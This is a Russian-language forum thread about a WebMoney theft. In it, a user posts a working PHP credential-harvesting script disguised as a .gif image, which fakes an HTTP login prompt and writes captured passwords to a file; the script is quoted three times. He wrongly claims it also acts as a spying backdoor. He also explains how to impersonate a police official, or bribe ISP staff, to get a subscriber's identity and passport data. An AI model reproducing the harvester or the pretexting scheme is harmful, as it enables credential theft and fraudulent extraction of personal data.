56 ответов в данной теме

[жужа (WMID 250820934517 )]

Закинул почварку через протокол ICQ ? Мониторил мои действия и был таков?

[жужа (WMID 250820934517 )]

с саппортом мне везёт меньше, чем вам, Устим Молчат по-прежнему

[Устим (WMID 160425465957 )]

Да жужа))) С тобой поступили очень легко. Показываю пример как это делается:
1. Создаётся вирус в блокноте типа такого кода:

<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
  Header('HTTP/1.1 401 Unauthorized');
  Header('WWW-Authenticate: Basic realm=" Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>

2. сохраняем файл под названием smile, потом меняем расширение на .gif
3. Отправляем файл вам, вы его открываете сами того не понимая и вуаля. Вирус а именно бекдор уже в системме и свободно сканирует фотографирует каждое действие, смотрит активность программ, вытаскивает всё из буфера обмена и в заданное создетелём время шлёт всё на мыло.
Ничего сложного в общем то
Так что ищем АЙПи и будем наказывать. Но мне хотелось бы чтобы айпи нашёл ещё и человек у которого спёрли 1040 вмз. Там можно и правохранительные органы привязать. А за сотку будем всё добиватся своими силами)

п.с. Вирус я написал для взлома админок в интернете. Детский. Аська его не примет, так что можите не пробовать!

[жужа (WMID 250820934517 )]

п.с. Вирус я написал для взлома админок в интернете. Детский. Аська его не примет, так что можите не пробовать!

Всё стало на свои места. Спасибо за науку, Устим.
Тех. поддержка молчит, как вод набравши.
Сообщений 15 накидал - не хотят разговаривать.
Каковы мои действия после того, как я установлю его айпи?

[жужа (WMID 250820934517 )]

Пробовать не думал. Я представляю силы добра

[Устим (WMID 160425465957 )]

Есть несколько способов. Сейчас я приведу пример как при мне вычыслели человека за 10 минут, а потом напишу минусы и другие примеры.
То есть. После получения айпи мы вводим его на сайте "хуиз" например, и видим провайдера. Допустим это провайдер Укртелеком (Я буду говорить о том как делось у нас в Киеве)
Звоним на Укртелеком и представляемся Начальником МВД в г.Киева в Шевченковском районе Пупкиным О.П. Запрашимаем соединение с техническим отделом по интернету. Там представляемся так же. Говорим что в то то число в такое то время поступило заявление о кражи личной информации с персонального компьютера. Нами было установлено (прав.органами) что доступ был произведён с такого то иапи адреса, провайдером которого являетесь ВЫ! Так что просим помочь, проверить, узнать, уточнить кому пренадлежит данный айпи. То есть на кого зарегистрирован.
Для нас выдали Полный адрес, дату регистрации, имя фамилию, и паспортные данные в течении 15-ти минут.
Для Вас важно чтобы тот самый укртелеком не умничал и не просил документально обратится к ним. Тогда всё пропало. в этом методе.
Хотя не всё. Можно узнать кто работает в тех сервисе провайдера и пригласить человека на кофе. Россказать всю ситуацию, сунуть в карман 50 баксов и получить инфу. Я за 1040 баксов тупо зашёл бы в офис провайтера и так и сделал бы.

[Vampir (WMID 178186655861 )]

Звоним на Укртелеком и представляемся Начальником МВД в г.Киева в Шевченковском районе Пупкиным О.П. Запрашимаем соединение с техническим отделом по интернету. Там представляемся так же. Говорим что в то то число в такое то время поступило заявление о кражи личной информации с персонального компьютера. Нами было установлено (прав.органами) что доступ был произведён с такого то иапи адреса, провайдером которого являетесь ВЫ! Так что просим помочь, проверить, узнать, уточнить кому пренадлежит данный айпи. То есть на кого зарегистрирован.
Для нас выдали Полный адрес, дату регистрации, имя фамилию, и паспортные данные в течении 15-ти минут.

IPшки у Укртелекома динамичные, к тому же в ОГОшке поддерживается раздача по сеты инетдоступа для друзей/соседей...

[жужа (WMID 250820934517 )]

В службе поддержки сказали обращаться в правоохранительные органы.
Айпи дать отказались.
Отправил иск, но он не будет рассмотрен, пока я не внесу взнос в размере 7 вмз.
Вопрос у меня такой:
имеет ли смысл оплачивать иск, если всё упирается в поход в милицию? В арбитраже мне, я так понимаю, скажут то же самое? обращайтесь в местное отделение правоохранительных органов?

[жужа (WMID 250820934517 )]

А ещё этот фрукт (мошенник) он-лайн в кипере круглые сутки. На сообщения, естественно, не отвечает.

[Sub Zero (WMID 703704269665 )]

Отправил иск, но он не будет рассмотрен, пока я не внесу взнос в размере 7 вмз.

Почитываю форум и потому могу сказать - раз просят внести взнос - то деньги еще на кипере. Советую. уплатить.

[Vampir (WMID 178186655861 )]

Отправил иск, но он не будет рассмотрен, пока я не внесу взнос в размере 7 вмз.
Вопрос у меня такой:
имеет ли смысл оплачивать иск, если всё упирается в поход в милицию? В арбитраже мне, я так понимаю, скажут то же самое? обращайтесь в местное отделение правоохранительных органов?

Смысл имеет - если иск не станут рассматривать то взнос вернут.

[Randal (WMID 202698409817 )]

В самом начале активного использования ВМ (около года назад) довелось и мне столкнуться с этим мошенником. Думаю, это один и тот же человек т.к. схема действий полностью идентична. Отличие только в том, что ранее он рассказывал всем байки про проверку через сертификат Х19, после чего подкидывал трояна под видом этого сертификата (в общем, расчёт был именно на начинающих пользователей, которые слабо соображают в технологиях ВМ). Сейчас, судя по вашим словам, он нашёл способ лучше и закидывает трояна, используя дыры в определённых icq-клиентах (кстати, а какой у вас?)
Найти его, к сожалению, нереально: он использует прокси с украинским ip, который не ведёт логов (скорее всего это ещё один затрояненый комп), а деньги обналичивает через оплату номеров российских МТС, которые оформлены на бомжей или студентов, а для международного розыска его обороты маловаты.
Мораль сей басни такова: скупой платит дважды. Захотели сэкономить 1-2% на обналичке? Получите!

[megadesby (WMID 125274810917 )]

Да. Я автор темы. Увели 1000$ у меня и больше всего выбесило что WMID даже не заблокировали на время проверки. Он спокойно вывел деньги. Саппорт ответил только через 24 часа. Классно да?

[megadesby (WMID 125274810917 )]

Не адекват? У нас нельзя вывести в Беларуси почти никак выводить деньги с Webmoney чтобы не узнали "дядьки", поэтому и пользовался данным методом, у нас терминалов нету как у вас в России. И если через банк выводить то узнают "злые дядьки" + потеряешь 35% от суммы. Весело у нас.

В самом начале активного использования ВМ (около года назад) довелось и мне столкнуться с этим мошенником. Думаю, это один и тот же человек т.к. схема действий полностью идентична. Отличие только в том, что ранее он рассказывал всем байки про проверку через сертификат Х19, после чего подкидывал трояна под видом этого сертификата (в общем, расчёт был именно на начинающих пользователей, которые слабо соображают в технологиях ВМ). Сейчас, судя по вашим словам, он нашёл способ лучше и закидывает трояна, используя дыры в определённых icq-клиентах (кстати, а какой у вас?)
Найти его, к сожалению, нереально: он использует прокси с украинским ip, который не ведёт логов (скорее всего это ещё один затрояненый комп), а деньги обналичивает через оплату номеров российских МТС, которые оформлены на бомжей или студентов, а для международного розыска его обороты маловаты.
Мораль сей басни такова: скупой платит дважды. Захотели сэкономить 1-2% на обналичке? Получите!

Сообщение отредактировал MegaBannerWM : 18 октября 2012 - 10:20

[megadesby (WMID 125274810917 )]

Общались с вором мы через Skype и больше никак. Никаких файлов он мне не переовал и я не скмчивал и не нажимал от него.

Но дело не в этом, угнетает подержка вебмани. Процесс можно было остановить до выяснения, чтобы он не успел вывести деньги.

Сообщение отредактировал MegaBannerWM : 18 октября 2012 - 10:25

[WtsGame (WMID 130281264476 )]

Да жужа))) С тобой поступили очень легко. Показываю пример как это делается:
1. Создаётся вирус в блокноте типа такого кода:

<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
  Header('HTTP/1.1 401 Unauthorized');
  Header('WWW-Authenticate: Basic realm=" Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>

2. сохраняем файл под названием smile, потом меняем расширение на .gif
3. Отправляем файл вам, вы его открываете сами того не понимая и вуаля. Вирус а именно бекдор уже в системме и свободно сканирует фотографирует каждое действие, смотрит активность программ, вытаскивает всё из буфера обмена и в заданное создетелём время шлёт всё на мыло.
Ничего сложного в общем то
Так что ищем АЙПи и будем наказывать. Но мне хотелось бы чтобы айпи нашёл ещё и человек у которого спёрли 1040 вмз. Там можно и правохранительные органы привязать. А за сотку будем всё добиватся своими силами)

п.с. Вирус я написал для взлома админок в интернете. Детский. Аська его не примет, так что можите не пробовать!

интересный метод, смотришь на улыбочку) и теряешь деньги)

[metallostroy.org (WMID 234064988281 )]

Да жужа))) С тобой поступили очень легко. Показываю пример как это делается:
1. Создаётся вирус в блокноте типа такого кода:

<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
  Header('HTTP/1.1 401 Unauthorized');
  Header('WWW-Authenticate: Basic realm=" Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>

2. сохраняем файл под названием smile, потом меняем расширение на .gif
3. Отправляем файл вам, вы его открываете сами того не понимая и вуаля. Вирус а именно бекдор уже в системме и свободно сканирует фотографирует каждое действие, смотрит активность программ, вытаскивает всё из буфера обмена и в заданное создетелём время шлёт всё на мыло.
Ничего сложного в общем то
Так что ищем АЙПи и будем наказывать. Но мне хотелось бы чтобы айпи нашёл ещё и человек у которого спёрли 1040 вмз. Там можно и правохранительные органы привязать. А за сотку будем всё добиватся своими силами)

п.с. Вирус я написал для взлома админок в интернете. Детский. Аська его не примет, так что можите не пробовать!

интересный метод, смотришь на улыбочку) и теряешь деньги)

В данном "коде" нет заявленного функционала.